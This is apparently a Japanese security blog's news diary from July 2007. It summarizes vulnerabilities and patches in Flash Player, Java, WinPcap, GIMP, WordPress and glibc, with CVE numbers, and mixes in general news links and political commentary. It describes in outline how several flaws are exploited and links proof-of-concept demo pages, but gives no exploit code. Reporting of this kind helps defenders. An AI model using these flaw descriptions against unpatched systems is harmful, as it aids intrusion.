CS2 / CS3 の Windows / Mac 用の修正プログラムが配布されているので適用すればよい。
Flash Player 9.0.45.0 以前 / 8.0.34.0 以前 / 7.0.69.0 以前に欠陥。
CVE-2007-3456。 攻略 SWF ファイルによって remote から任意のコードを実行できる。
CVE-2007-3457。 HTTP Referer ヘッダの処理に欠陥があり、CSRF 脆弱性が発生する。この欠陥は Flash Player 9 には影響しない。 JVN#72595280: Flash Player において任意の Referer ヘッダが送信可能な脆弱性 も参照。
CVE-2007-2022。Flash Player 7 と Opera / Konqueror との組みあわせで欠陥が発生する。 Changelog for Opera 9.20 for Windows で修正された件。 この欠陥は Flash Player 9 には影響しない。
Flash Player 9.0.47.0 / 8.0.35.0 / 7.0.70.0 で修正されている。 Wii や Play Station 3 の Web ブラウザについているのは 7.0.70.0 の模様。
関連: Flash Player のために信頼しなければならないドメイン (水無月ばけらのえび日記)
関連:
Flashの脆弱性でWiiもフリーズ状態に (ITmedia, 2007.07.23)、Wii gets Flashed by a bug too! (symantec blog, 2007.07.20)。あれぇ? バージョン番号からすると、欠陥の影響を受けないはずなんだけどなぁ……。PS3 はどうなんだろう。
忘れられたWii対応? Flashパッチのバージョン番号に混乱 (ITmedia, 2007.07.24) より:
Kasperskyによると、WiiのFlash Player 7.0.70.0は、ほかのプラットフォーム用の7.0.70.0よりも前の日付になっており、同じものでないことは明らかだという。AdobeのサイトにWiiについての記載はなく、Wiiのことは忘れられているようだという。
バージョン番号が同じでも日付が違うのはよくあることなので別にいいのですが、中身まで違っていると困るのですよね……。
出ました。
Microsoft Update失敗したらageるスレ 15 では、.NET Framework 1.x / 2.x の patch のインストールに失敗する事例が複数報告されている。 この場合には、次のようにするとよいらしい。
あと、.NET Framework 3.0 は 2.0 のスーパーセットなので、.NET Framework 3.0 だけが入っている環境でも 2.0 相当部分に対して patch の適用が必要 (Microsoft Update とかすると patch の適用を求められる) ようです。
関連:
》 魔法のiランド は今日も止まってます。「メンテナンス作業が大変困難な状況となっており、もうしばらくかかる見込みです」だそうです。
》 第3回ばりかた勉強会。 2007.08.18、福岡県福岡市、1000 円。花田さん情報ありがとうございます。
》 CERT/CCがインシデント管理能力の評価基準書を公開 (日経 IT Pro, 7/11)
》 年金記録問題「安易な処理蔓延」 検証委が中間報告 (asahi.com, 7/10)
》 原爆投下:米に対し抗議の記録なし…政府答弁書 (毎日, 7/10)。その程度ってことで。
》 米軍 ペルシャ湾に3隻目空母 (NHK, 7/10)。いよいよ戦争ですか?
》 7月5日からの梅雨前線による大雨の被害等について(第2報) (平成19年7月10日19時00分現在) (bousai.go.jp)
》 「『脆弱性』より『セキュリティホール』の方が有名」、IPAの調査 (日経 IT Pro, 7/10)。『セキュリティホール』はふつうの日本人ならまず間違いなく読めるけど、『脆弱性』は必ずしもそうではないようだからなあ。 音もよくないし。
》 SF.jp 今月のプロジェクト[0707]:TOMOYO Linux (Open Tech Press, 7/10)
》 オープンソースカンファレンス2007 Kansai に BSDなひととき (7/21) があるそうです。 ソフトウェア脆弱性情報流通のこれまでとこれから (7/20) というのもあるなあ。 よしだともこファンの人はオープンソースと社会 (7/21) かなあ。
》 安倍政権初の「骨太方針」で増えたもの (日経 BP, 7/9)
いずれにしても、「骨太の方針2007」が具体化された過程を通じて、小泉内閣の下で進められてきた経済財政の官邸主導という形が突き崩されたのは確かである。
》 ANA、年内に紙の航空券を廃止、FeliCa&QRコードに全面移行 (ITmedia, 7/10)
》 シエスパ取り壊し、渋谷区に伝達…温泉爆発で再開断念 (読売, 7/10)
》 携帯電話が爆発、作業員死亡=原因は偽の電池か‐中国 (時事, 7/9)。濱田さん情報ありがとうございます。
》 VirusScan Enterprise で、ファイルやフォルダのスキャン除外対象とする場合のワイルドカードの使用方法 (マカフィー)。任意の複数の階層を示す ** が使えるんですね。
》 Common Management Agent (CMA) 3.6 Patch 1 での修正項目一覧 (マカフィー)。アップデートタスク実行時に PendingFileRenameOperations のレジストリに書き込みが行なわれます (マカフィー) も解決されています。
》 SOX先行組からの教訓? TDKとキヤノンのケース 日経産業新聞から・・・ (まるちゃんの情報セキュリティ気まぐれ日記, 7/10)
》 総務省 確定 「地方公共団体における情報セキュリティ監査に関するガイドライン」 (まるちゃんの情報セキュリティ気まぐれ日記, 7/9)
》 フィッシング対策協議会 「フィッシングに関するユーザ意識調査報告書」、 「フィッシング対策における技術・制度調査報告書 2007」 (まるちゃんの情報セキュリティ気まぐれ日記, 7/6)
》 総務省 「P2Pネットワークの在り方に関する作業部会」報告書 (まるちゃんの情報セキュリティ気まぐれ日記, 7/6)
》 個人情報保護法の過剰反応は依然相次ぐが内閣府は改正に消極的? (まるちゃんの情報セキュリティ気まぐれ日記, 7/4)
》 内閣府(防災) 中央省庁業務継続ガイドライン (まるちゃんの情報セキュリティ気まぐれ日記, 7/4)
》 ヤフーとマイクロソフト、ウェブ検索のプライバシーポリシーをまもなく更新か (CNET, 7/9)
》 Vista仮想化のライセンス条件緩和が中止--MSが方向転換した背景 (CNET, 7/3)。Vista Home Basic / Premium の例の話。
》 ジャパンネット銀行、フィッシングサイト閉鎖サービスを導入 (日経 IT Pro, 7/9)。ジャパンネット銀行がフィッシング詐欺対策の強化に「RSA FraudAction」を採用 (RSA, 7/9)
》 サンゴ難病に“手術”有効 沖縄で確認、本格治療へ (中日, 7/9)
》 大気汚染物質:国境越え流入75%も 国際協力が急務 (毎日, 7/9)
》 無罪判決が急増 証拠評価の厳格化の表れ? (asahi.com, 7/9)
》 緒方元長官の逮捕、決め手は仲介元銀行員の供述 (asahi.com, 7/8)
》 さおだけ屋:トラブル増加 国民生活センター注意呼びかけ (毎日, 7/7)、移動販売等での物干し竿購入に関するトラブルに注意! 2本1,000円のはずが・・・、高額な料金を請求されることも (国民生活センター, 7/7)
》 ハッカーグループ、iPhoneのロック解除法を公開へ (CNET, 7/9)
SUSE Linux Enterprise Serverの多数のコンポーネントはさまざまなライセンスで管理されており、既存製品でGPLv3を採用しているものは1つもない。しかし、ファイルのデコード用に幅広く利用されている「tar」コマンドユーティリティには既にGPLv3が適用されており、Novellもアップデート時にGPLv3コンポーネントを組み込む意向を明らかにしている。tar-1.17 は GPLv2 だけど、tar-1.18 は GPLv3 なんですね。
》 スパマーがCAPTCHAの突破に成功? (slashdot.jp, 7/9)。 スパムクローラからフォームを隠すのも大切ですか。
》 The reason behind the "We're sorry..." message (Google blog, 7/9)。検索結果として CAPTCHA が表示される (ことがある) 理由。Santy については PHP を使ったページにおけるプログラミングエラーを攻略するワームが登場を参照。
》 Cross-domain policy files (State of Security, 7/9)。Flash Player の cross-domain policy files の話。
》 著作権保護期間延長の議論がかみ合わないわけ (栗原潔のテクノロジー時評Ver2, 7/10)。 保護期間延長の是非を問う議論がスタート、文化審議会小委 (Internet Watch, 6/26) の話。
一部の「識者」の方が著作者人格権と著作財産権を明確に区別できていないという点が話がかみ合わない理由のひとつのように思えます。さらに言うならば、諸外国の制度との調和を理由として著作権保護期間の延長をせよと主張するのならば、諸外国と比較して著作者の人格権保護に手厚い日本の制度も見直すようにしないと整合性が取れない気もします(注: 米国の著作権法では著作者人格権の考え方はありません。)
》 アメリカのどの地域で何教徒が多いのかを表した地図 (gigazine, 7/10)
》 緊急メンテナンスのお知らせ (魔法のiランド)
現在魔法のiらんどサーバー内への不正アクセスを行う形跡が確認された為、アクセスのブロックを行っております。 不正アクセスに対処する為に、緊急メンテナンス(調査及び対策)を24時間体制にて実施中です。
》 「セキュリティ製品は性能でこそ選ぶべき」 ジャストシステムに聞く、カスペルスキー製品の販売戦略 (Internet Watch, 7/9)
まずは我々の「性能でこそ選ぶべき」というメッセージに関心を持っていただいた人に買っていただければということで、マーケットシェアとしては5%を取れれば成功だろうと考えています。
そういう意味では、製品のパッケージデザインなども、従来のジャストシステムの製品とは違っています。(中略) カスペルスキーは5%に向けた製品ですので、多少嫌われてもいいと。目に付かないで通り過ぎられるよりは、「あのおじさんなんか怖いね」と言われても、印象に残る方が大事だという考えです。
●対応方法(推奨)インド人もびっくり。
兵庫県電子申請システムを利用後にJREを非稼動状態にしてください。 再度、兵庫県電子申請システムを利用する場合は、再びJREを有効にします。
非稼動状態にする方法
Windowsの「スタート」→「設定」→「コントロールパネル」→「Java Plug-in」のアイコンをクリックします。
「Java Plug-inコントロールパネル」が表示されますので、「ブラウザ」タブを選択して各ブラウザのチェックボックスをオフ(無効)にし、「適用」ボタンをクリックします。
最後に、Windowsを再起動してください。
……「使わないときは Java Plug-in は無効に」を指示しているのは兵庫県電子申請システムだけではないそうで。Benjamin さん情報ありがとうございます。
こんなありえない (徹底できそうにない) 指示を出すくらいなら、いっそのこと、 電子申請クライアント全体を仮想化して、VM イメージを配布した方がいいんじゃないの。
》 空港のシステムのセキュリティーは大丈夫なのか? (gigazine, 7/9)。Windows セキュリティセンターからの警告が空港の発着表示に……。
》 Winnyの脆弱性を発見した元米eEyeの技術者らが日本でセキュリティ・サービス会社を設立 (日経 IT Pro, 7/9)。 フォティーンフォティ技術研究所 のこと。 BGM: 帰ってきたウルトラマン
Anti-DNS Pinning 関連話。Firefox 2 / IE 7 + JRE 5 / 6 で動くそうです。
Anti-DNS Pinning の一般知識について日本語で読みやすいのはこのあたりでしょうか。
また、Anti DNS Pinning の実装として、JavaScript から Java を利用したり、 Flash を利用するといった方法もある。jumperz.net を運営する金床氏のサイトにデモも公開されているため、興味のある方は参照するとよいだろう(デモにアクセスする際は不用意にローカル環境の IP アドレスを入力しないよう、注意していただきたい)。
Anti-DNS Pinning + Socket in FLASH : Online Demonstration
http://www.jumperz.net/index.php?i=2&a=1&b=8
Anti-DNS Pinning + Java in JavaScript : Online Demonstration
http://www.jumperz.net/index.php?i=2&a=1&b=9
ウェブアプリケーションセキュリティが発売されれば、それがいちばん読みやすくなるのかな。うぅむハードカバーですか……。
Sun JDK / JRE 5 Update 11 以前, JDK / JRE 6 Update 1 以前に欠陥。 Java WebStart に欠陥があり、攻略 JNLP ファイルを開くと任意のコードを実行される。攻略 Web ページに攻略 JNLP ファイルを仕掛けることで、ActiveX の助けを借りることなく攻略可能。 CVE-2007-3655
Sun JDK / JRE 5 Update 12, JDK / JRE 6 Update 2 で修正されている。
なお、Sun JDK / JRE 5 Update 11 以前, SDK / JRE 1.4.2_13 以前には他にも (?) Java WebStart 方面の欠陥があり、JDK / JRE 5 Update 12, SDK / JRE 1.4.2_14 で修正されている模様。
WinPcap 4.0 (Wireshark 0.99.5 に同梱) に欠陥。NPF.SYS に欠陥があり、 local user が kernel 権限で任意のコードを実行できる。 CVE-2007-3681
WinPcap 4.0.1 で修正されている。
GIMP 2.2.15 以前に複数の欠陥。画像読み込みプラグインに複数の欠陥があり、 攻略 DICOM, PNM, PSD, PSP, Sun RAS, XBM, XWD 画像を使って任意のコードを実行可能。 CVE-2006-4519
GIMP 2.2.16 で修正されている。
CSIRTメモ: JVN に掲載されたクロスサイト・スクリプティング問題 (日経 IT Pro, 2007.07.10) に今回の話の時系列が出ています。
》 InterScan Messaging Security Suite 7.0 Linux版 Security Patch 公開のお知らせ (トレンドマイクロ, 7/9)
》 事故防止効果大きい 歩車分離信号 (JANJAN, 7/9)
歩行者側の信号が青現示の時には、車両側を右折・左折させず、逆に車両側が右折・左折する時は、歩行者側を赤現示にする方式が、「歩車分離信号」である。効果は大きく、歩車分離信号を導入した交差点では人身事故が4割減少するという。しかし前述のように、信号のある交差点のうち、2%にしか設置されていない。
》 やりたい放題の学内ネットワークに「喝!」 (ITmedia, 7/6)。どこかで聞いたような話?
》 寺澤有vs武富士、東京地裁判決下る (SLAPP WATCH, 7/5)
》 SLAPP体質の企業のさまざまな手口 (SLAPP WATCH, 7/8)
》 デジタル放送番組、コピー9回までOK…総務省が要請へ (読売, 7/7)。 この中途半端さは何なのさ。
》 Googleの支配を受け入れられるか? (ITmedia, 7/9)
》 ソニー、新聞で英国教会に公式謝罪 (ITmedia, 7/9)
》 知財の常識が通用しない世界 (ITmedia, 7/6)。中国ねた。
》 LSE、Winny開発者の控訴審に提出するための意見書を募集 (Internet Watch, 7/6)。LSE = NPO 法人ソフトウェア技術者連盟。7/末締切。
》 Googleの検索ボットに偽装すると有料サイトが無料で閲覧できるらしい (gigazine, 7/9)。有償サイトなのに Google 検索に情報があるサイトは多いからなあ。
》 Error message when you try to remove a password from a compressed folder or add a password to a compressed folder on a Windows XP-based computer: "Compressed (Zipped) Folders Error" (Microsoft)。有償 fix が出ているようです。
》 Best practices and known issues when you install Windows Server 2003 Service Pack 2 on a Windows Small Business Server 2003-based computer (Microsoft)
》 An update package for Background Intelligent Transfer Service (BITS) is now available for Windows Server 2003 and for Windows XP (Microsoft)。BITS 2.5 登場。Microsoft System Center Configuration Manager 2007 や Windows Live OneCare に必要だそうで。IPv6 にも対応しているそうで。
》 A memory leak occurs when an application performs a snapshot on a computer that is running Windows Server 2003 (Microsoft)。Volume Shadow Copy Service でメモリリークだそうです。有償 fix が出ているようです。
》 Applications that use the Cryptography API cannot validate an X.509 certificate in Windows Server 2003 (Microsoft)。Windows Server 2003 の Cryptography API 2 (CAPI2) が SHA2 をサポートしていないそうで。有償 fix が出ているようです。
》 Stop error message when an application that uses Winsock is running on a Windows Server 2003-based computer: "Stop 0x0000007E" (Microsoft)。Quota 方面。有償 fix が出ているようです。
》 How to use Group Policy to add the MaxTokenSize registry entry to multiple computers on a domain controller that is running Windows Server 2003 or that is running Windows 2000 (Microsoft)。 関連: ユーザーが多数のグループに所属している場合に Kerberos 認証で発生する問題の新しい解決方法 (Microsoft)
ユーザーが多数のグループに所属している場合、そのユーザーに対する認証やグループ ポリシー設定で問題が発生することがあり (中略) ユーザーが 120 を超えるグループに所属している場合、MaxTokenSize 値で決定されるバッファのサイズでは不十分です
MaxTokenSize を大きな値に変更する (デフォルト: 8000 (Windows 2000 gold/SP1)、12000 (Windows 2000 SP2 以降、Windows Server 2003) ことで回避できるそうです。
》 Xbox 360 の新たな製品保証プログラムに関する 一部新聞報道への弊社の見解 (xbox.com, 7/6)
本日マイクロソフトが全世界で発表いたしました Xbox 360 の新たな製品保証プログラムに関しまして、一部新聞報道で「Xbox 360、不具合で回収」という見出し、及び記事文中で「自主回収」という表現が出ておりますが、今回のプログラムは製品の回収を行うものではありません。
本製品保証プログラムでは、Xbox 360本体で3つの赤いランプが点滅する現象が起きた場合、ご購入日から3年間は無償で修理させていただき、過去この現象において有償修理を行ったお客様には、修理代金を返金させていただくというものです。
》 Xbox 360の不良原因は「芋半田」? (slashdot.jp, 7/8)。熱設計もヨクナイという話もあるようで。
》 [AML 14776] 海自大阪湾展示演習、「花火」で「火花」。 2007.08.04〜05、大阪湾 淡路島東方海域、乗艦予定場所は大阪港・神戸港・津名港で調整中、往復はがきにて応募 (平成19年7月18日(水)必着)。 応募方法などは平成19年度呉地方隊展示訓練 乗艦を御希望の皆様へ を参照。乗船時間は 6 時間なので、船酔いしやすい人は注意。
》 航空輸送の安全にかかわる情報(平成18年度分)の公表について (国土交通省, 7/6)
平成18 年度においては、航空事故2 件及び重大インシデント2 件のほか、改正航空法第111 条の4 に基づき平成18 年10 月から新たに報告が義務付けられた「安全上のトラブル」(注)325 件が報告されました。これらの「安全上のトラブル」は、それ自体は軽微なトラブルですが、その発生傾向等を分析して予防的安全対策に活用するため、新たに報告を求めることとしたものです。
》 片山さつき議員の「システムは数カ月でできる」発言に思う (日経 IT Pro, 7/9)
テレビに映し出された片山氏の発言はそこで終わったのだが,隣席の出席者から小声で訪ねられたのだろう,小さな声で「マイクロソフトの…」という片山氏の私語が短い時間流れた。
筆者はその私語から憶測を始めた。マイクロソフトの誰かが片山氏に対して「社保庁の年金記録に関する情報処理システムの刷新は数カ月でできる」などと説明したのだろうか。あるいは,マイクロソフトから社保庁の新システムに関する提案のようなものがあったのだろうか。
》 韓国水産物35種、ダイオキシン汚染が深刻 (JANJAN, 7/7)
私たち「市民環境研究所」などは、深刻な水産物汚染の主要因が無分別に行われている廃棄物焼却と廃棄物の海洋投棄にあると考えている。2006年の1年間、海に捨てられたゴミは実に880万トンである。全国10ヵ所余りの港湾で専用船舶に載せられた陸上廃棄物が西海(黄海)で1ヶ所、東海(日本海)で2ヶ所に投棄されている。その量は8,811,570立方メートルで、5トントラック176万台分にあたり、一日平均では5トントラック4828台分の量である。
+Lhaca 1.21 にもまだ欠陥が残っていた話の詳細:
[Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities (2007.06.30)。 Firefox 1.5.0.12 / 2.0.0.4 における onkeydown イベントの扱いに欠陥がある模様。 Javascript を有効にしてデモサイト http://yathong.googlepages.com/FirefoxFocusBug.html にアクセスし、ファイル名入力欄に文字を入力すると、その下にテキストエリアにその文字が表示されてしまう。 CVE-2007-3511
Advisory : Internet Explorer Zone Domain Specification Dos and Page suppressing (2007.07.03)。IE 6 / 7 DoS ねた。 CVE-2007-3550
Defeating The Same Origin Policy (The 零 Hacker Webzine, 2007.06.28)。 IE と Safari で same origin policy が守られていない話。 CVE-2007-3514 (Safari 3.0.2 for Windows) CVE-2007-3482 (Safari) CVE-2007-3481 (IE)
Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC (milw0rm, 2007.06.27)。 SONY の ネットワークカメラ SNC-P5 のモニタリングソフトの ActiveX コントロールに欠陥があり、攻略 web サイトが任意のコードを実行できる恐れがある模様。 CVE-2007-3488
CVE-2007-3490。中国語版 Excel 2003 SP2 + patch 全部でなにやら起こるという PoC コード がある模様。
CVE-2007-3506。Freetype 2.3.3 以前の話。
CVE-2007-3513。Linux カーネル話。2.6.22-rc7 で修正されている。
Arbitrary File Upload Vulnerability in WordPress and WordPress MU (buayacorp.com, 2007.06.23)。 WordPress 2.2 および WordPress MU <= 1.2.2 において、WordPress の制限を回避して任意のファイルをアップロードできる模様。 最新の WordPress 2.2.1 / WordPress MU change set 1005 においても部分的にしか修正されていないとされている。 CVE-2007-3544 CVE-2007-3543
CVE-2007-3546。Nessus 3.0.x の Windows GUI に XSS 欠陥があり、 3.0.6 で修正された話。
CVE-2007-3508。glibc < 2.5-rc4 の elf/rtld.c にある process_envvars 関数に integer overflow する欠陥があり、 local user が長大な LD_HWCAP_MASK 環境変数を使って任意のコードを実行できる模様。
CVE-2007-2949。 Gimp 2.2.15 の PSD プラグインの psd.c にある seek_to_and_unpack_pixeldata 関数に integer overflow する欠陥があり、 攻略 PSD ファイルを使って任意のコードを実行できる模様。 revision 22798 で修正された模様。
CVE-2007-3568。imlib < 1.9.15 の _LoadBMP における bmp の処理において DoS が発生する模様。
Apache Derby 10.2.1.6 Release。 DERBY-1858: A schema can be dropped by a non-schema owner in SQL authorization mode (CVE-2006-7217)、 DERBY-1708: Unprivileged user can perform lock table statement on a table which he/she does not have any access rights (CVE-2006-7216) が修正されている。
About new XSS vectors and some PHP-IDS filters。 IE の話と PHPIDS の話が書かれている。 PHPIDS については、 CVE-2007-3577 CVE-2007-3578 CVE-2007-3579 CVE-2007-3580 を見る限りでは 20070703 版 (開発版?) で修正されているみたい。 IE の話は CVE-2007-3576 だけど DISPUTED 扱いされている。
NOTE: other researchers dispute the significance of this issue, stating "this only works when typed in the address bar."
》 OpenIDの仕様と技術(1)仕様から学ぶOpenIDのキホン (@IT, 7/6)。ふつうじゃない言葉で説明するのはやめてほしい。 ふつうは
という言葉を使う。authentication を「証明」と呼ぶのはまだしも、authorization を「認証」と呼ぶのは犯罪に近い。編集者はこの点に関して何とも思わなかったのか?
なお、原文では
賢明な読者は気付かれたかもしれませんが、ここではあえて証明システムと書いています。一方ではてなやJugemKeyは認証APIと銘打っています。
これらの呼び方についてとやかくいうつもりはありませんが、証明(authentication)と認証(authorize)は明らかに異なります。
となっているが、名詞と動詞を比べている時点で typo だと認識したので、上記では authorization と書いている。
》 サンデープロジェクト・コメント名誉毀損訴訟、始まる (SLAPP WATCH, 7/6)。これも安倍氏ねたということになるのだが、提訴内容があまりに異常。
》 NASAが衛星を緊急移動、中国のスペースデブリとの衝突回避のため (technobahn, 7/7)。チャイナリスク。
》 赤城農相:政治団体が実体ない事務所に経費…父親の自宅 (毎日, 7/7)。ここまで続くと、安倍氏って本当に人を見る目がないんだなあ、と思わざるを得ない。
赤城徳彦農相(衆院茨城1区)が関係する政治団体「赤城徳彦後援会」が、茨城県筑西市の父親の自宅を団体の所在地として届け、05年までの10年間に約9045万円に上る経常経費を計上していたことが7日、政治資金収支報告書から分かった。父親は「(事務所として)使っていない」と話し、事務所としての実体がないことを認めた。また東京・世田谷の妻の実家に事務所を置く政治団体「徳政会」も毎年100万円以上の経常経費を計上しながら、少なくともここ10年は活動実態がなく、1000万円以上が不透明な支出となっていることが分かった。
「戦えない」参院選前に与党困惑…赤城農相の事務所問題 (読売, 7/7)
5日に閉幕した通常国会では、閣僚らの不透明な事務所費問題を契機に与党が提出した改正政治資金規正法が成立。与党は「『政治とカネ』の問題に一区切りがついた」としていた。だが、規制の対象が資金管理団体のみであるため、民主党は「政治団体の経常経費支出として報告すれば、詳細を公表する必要がなく、ザル法」と批判していた。
野党の主張どおりであることを、閣僚が自らの身をもって証明してしまった模様。GJ
》 米国防総省の「謎の新施設」、HAARPが完成 (WIRED NEWS, 7/6)
》 A glimpse of the future (f-secure linux blog, 7/6)。F-Secure Linux Security 7.0 Technology Preview だそうです。 次のバージョンでは client / server の区別がなくなるそうです。
ダウンロードしようとすると 404 なんですけど…… orz。 …… link が腐っているようです。 http://www.f-secure.com/linux-weblog/files/f-secure-linux-security-7.00.6275.tgz からダウンロードできます。
》 ビジネスのペーパーレス化、セキュリティがネックに——社外向け文書では紙媒体に回帰する現象も (Open Tech Press, 7/6)
》 欠陥マンション、損賠請求基準を拡大 (TBS, 7/6)、欠陥マンション、施工者にも賠償責任・最高裁初判断 (日経, 7/6)。最高裁第2小法廷 (今井功裁判長) はこう言ったそうで。
建物の強度に限定せず、居住者や通行人らを危険にさらすような“基本的な安全性を損なう欠陥”がある場合にまで範囲を広げ、設計・施工者は賠償責任を負うとする初めての判断を示したのです。その具体的な一例としては、「バルコニーの手すりに欠陥があり、転落の危険がある場合」をあげています。
で、高裁に差し戻しだそうです。
》 「SAT」の訓練を警視庁が初公開 (TBS, 7/6)
》 中国、空母建造に着手か 09年にも完成と研究機関 (中日, 7/6)
》 Codec: Not just Coder and Decoder (McAfee blog, 7/5)。ニセモノ話。
》 厚生労働省電子申請・届出システムのJREの脆弱性についての対応 (厚生労働省, 7/6)、厚労省の電子申請ソフト欠陥、原因はパッチ更新の慢性的な滞り (日経 IT Pro, 7/6)。古い JRE (Java 実行環境) を使えと言いつづけていました系の話。 今は JRE 1.4.2_15 ベースになった模様。
》 Java SE 6 Update Release Notes (Sun)。1.6.0_02 が出たそうです。Security Baseline は 1.5.0_12 / 1.4.2_14。
年金記録問題の迷走で幕引きをはかりたい一心の安倍総理は、今日記者会見を行って「わたしの内閣ですべて解決する」と大見得を切った。報道各社も疑問符付きで伝えているが、「宙に浮いた年金5000万件」と「未入力の年金1430万件(船員保険36万件別)」については意気込みを語るものの、社民党の調査で判明した「棄てられた年金記録」については一切語ろうとしない。
※「別人台帳」整備依頼のあった被保険者記録と旧台帳の氏名及び生年月日が相違しているもの。
※「事故台帳」旧台帳の記入漏れ、判読不能だったものや、年金手帳番号が二重払いになっているもの、または「男」「女」などの種別が相違しているもの
》 クレハ:工業薬品からPCBを検出で全量を回収 (毎日, 7/6)、 トリクロロベンゼンからのPCB検出について (クレハ, 7/6)
》 「Xbox360」に不具合、世界中で無償修理へ (読売, 7/6)、Microsoft Expands Xbox 360 Warranty Coverage (Microsoft, 7/5)。 日本の Presspass にはまだ何もないですが、 Xbox 360 のお客様へ (xbox.com) というおしらせが。 米Microsoft、Xbox 360の保証期間を3年に延長 日本でも同様の対応 (Game Watch, 7/6) という記事も出てます。
》 Windows Vista および Microsoft .Net Framework 2.0 対応「Microsoft Office Visio 内部統制文書化ツール」とソースコードの無償配布を開始 (Microsoft, 7/4)
》 パナマ:中国産原料のせき止め薬で死者387人 (毎日, 7/6)。ジエチレングリコール話。従来言われていた数字よりも被害者が多い模様。
》 露元中佐毒殺:KGB元職員の身柄引き渡し要求を正式拒否 (毎日, 7/6)。リトビネンコ氏暗殺話。
》 朝鮮総連都本部:支部入居ビルに移転へ 競売立ち退きで (毎日, 7/6)
》 ステルス戦闘機:日本売却で情報漏えい懸念 米議会 (毎日, 7/6)。F-22 ラプターの話。
「不注意による米軍の技術や知識の漏えいは脅威になりうる」と指摘、イージス艦情報漏えい事件を「その一例」と警告した。
確かにねぇ。
》 攻撃ツール「MPack」が大安売り、悪用が急増する恐れあり (日経 IT Pro, 7/6)。85% OFF だそうです。
関連: MPack:大量ハッキング・ツールの変わった例 (日経 IT Pro, 7/6)
》 ウイルスバスター コーポレートエディション 8.0 再公開のお知らせ (トレンドマイクロ, 7/6)。2007.07.19 に再公開されるそうです。
》 日経コンピュータ 2007.7.9 号の「ネットワーク・セキュリティ最新実践講座」は、京大の高倉先生による『「ハニーポット」に見る最新の攻撃傾向』ですね。
2007.06.29 付で更新されており、SDK / JRE 1.4.2_15 も入手できるようになっている。
もうそんな時期なんですね。
新しい事前通知ですが、Microsoft としてはフィードバックを求めているそうです。
出ました。
Microsoft Update失敗したらageるスレ 15 では、.NET Framework 1.x / 2.x の patch のインストールに失敗する事例が複数報告されている。 この場合には、次のようにするとよいらしい。
あと、.NET Framework 3.0 は 2.0 のスーパーセットなので、.NET Framework 3.0 だけが入っている環境でも 2.0 相当部分に対して patch の適用が必要 (Microsoft Update とかすると patch の適用を求められる) ようです。
関連:
いろいろ更新されている。
MS07-036 英語版が更新され、対象として Microsoft Office 2004 for Mac が追加されています (修正プログラムも掲載されています)。 MS07-036 日本語版もおいおい修正されるでしょう。
……修正されました。Office 2004 を利用している Mac ユーザは、Microsoft Office 2004 for Mac 11.3.6 更新プログラムを入手して適用してください。
MS07-039 - 緊急: Windows Active Directory の脆弱性により、リモートでコードが実行される (926122) が更新されている。なぜ Windows 2000 Professional も更新対象になっているのか話が追加されている:
影響を受けるソフトウェアはインストールしていませんが、なぜセキュリティ更新プログラムが提供されるのですか?
このセキュリティ更新プログラムにより解決される脆弱性はドメイン コントローラの役割で機能している Windows 2000 Server および Windows Server 2003 コンピュータのみに影響を及ぼしますが、影響を受けるコードは Windows 2000 および Windows 2003 のすべてのサポートされているエディションに存在します。この更新プログラムは、影響を受けるコードを含むすべてのコンピュータに提供されます。
MS07-041 - 重要: Microsoft インターネット インフォメーション サービスの脆弱性により、リモートでコードが実行される (939373) が改訂されました。
ホストされているアプリケーションで統計を保持するために IIS 5.1 が使用するオブジェクトに脆弱性が存在するという説明を追加しました。
よくよく見るとこれ、CVE-2005-4360 なんですね。2005 年って……
関連:
上記した 7月のセキュリティ リリース 後のまとめ (日本のセキュリティチームの Blog, 2007.07.13) において 940297 - Windows XP SP2 に .Net Framework を再インストールする方法 が紹介されていたので追記。
更新情報
.NET Framework 用の更新プログラムは累積的なものであり、セキュリティ以外の更新プログラムも含まれる場合があることを説明しました。また、この更新プログラムは .NET Framework 1.0 Service Pack 3 および .NET Framework 1.1 Service Pack 1 に適用するものであることを説明しました。
Windows Server 2003 に MS07-039 patch または SP2 を適用した場合に発生する不具合の話:
シングルドメインの場合には関係ありません。
》 「グリーティングカードが届いています」、偽の通知メールに注意 (日経 BP, 7/5)。手元の検体 3 つは、トレンドマイクロのパターン 4.581.00 では検出しないんだよなあ。
》 ミニカップタイプのこんにゃく入りゼリーによる事故防止のために ‐消費者への警告と行政・業界への要望‐ (国民生活センター, 7/5)。 米国、EU、韓国では規制されているんですね。
》 賞味期限切れマグロ、すき身商品に混ぜ出荷…マルハ子会社 (読売, 7/4)。他にもいろいろあるのかなあ。
》 コナカ:残業代支払い逃れ 多くの社員を「店長」に (毎日, 7/4)。うひゃ。
》 徒労感・見切り…社保庁職員、「自己都合」退職が急増 (asahi.com, 7/4)
》 ネットカフェ難民・名古屋で考える(8)「あの」グッドウィルで働いてみた【下】 (JANJAN, 7/5)
》 ウェブアプリケーションセキュリティ という本が 7/20 に出るらしいですよ。
》 コンピュータウイルス・不正アクセスの届出状況[6月分および上半期]について (IPA, 7/3)。Windows Vista では、autorun 方面をコントロールパネルで設定できるのですね。このあたりも参照。
》 あべこべじゃない美しい大臣は、いるのか? (関組長の東京・永田町ロビー活動日記blog版, 7/3)
》 SAP、オラクルからの「不正な情報入手」認める (CNET, 7/4)
》 鹿砦社名誉毀損刑事裁判、確定 (SLAPP WATCH, 7/4)。だめですね。
》 武富士の「恫喝・疲弊訴訟」を手助けする東京地裁(2) (共謀罪反対 THE INCIDENTS, 7/4)。だめですね。
》 米国政府、大規模サイバー攻撃を受けたエストニアに専門家チームを派遣 (computerworld.jp, 7/4)
》 ICANN、国際化ドメイン名の実用化に向け実環境テストを実施へ——トラブル発生時の問題抽出プロセスなどを検証 (Open Tech Press, 7/4)。IDN っていまだにそんな段階だったのね。
》 アフガニスタン:連合軍の民間人殺害 高まる大統領批判 (JANJAN, 7/3)
》 Windows CE/Mobile Rootkits (Symantec blog, 7/3)
》 BBC記者:「悪夢だった」4カ月の拉致から解放され (毎日, 7/5)
武装集団からラジオを与えられていたといい、同記者の解放を訴えるニュースを聞いて「計り知れないほどの精神的な励みになった。(世間から)忘れられているかもしれない、という恐怖心を和らげることができた」と感謝した。
上記記事によると、許宗萬氏の事情聴取にあたって官邸は、検察に「聴取したことが絶対にマスコミに漏れないようにしろ」という条件を付けたのだという。
ところが聴取の翌日、その事実を察知した各社が大きく報道。地検の怒りはすさまじく、各社は一週間の出入り禁止を命じられたのだという。
》 「プリオン病」治療に道、岐阜大チームが抑制物質を発見 (読売, 7/3)
》 経歴詐称疑惑、民主・世田谷区議が辞職 (読売, 7/3)
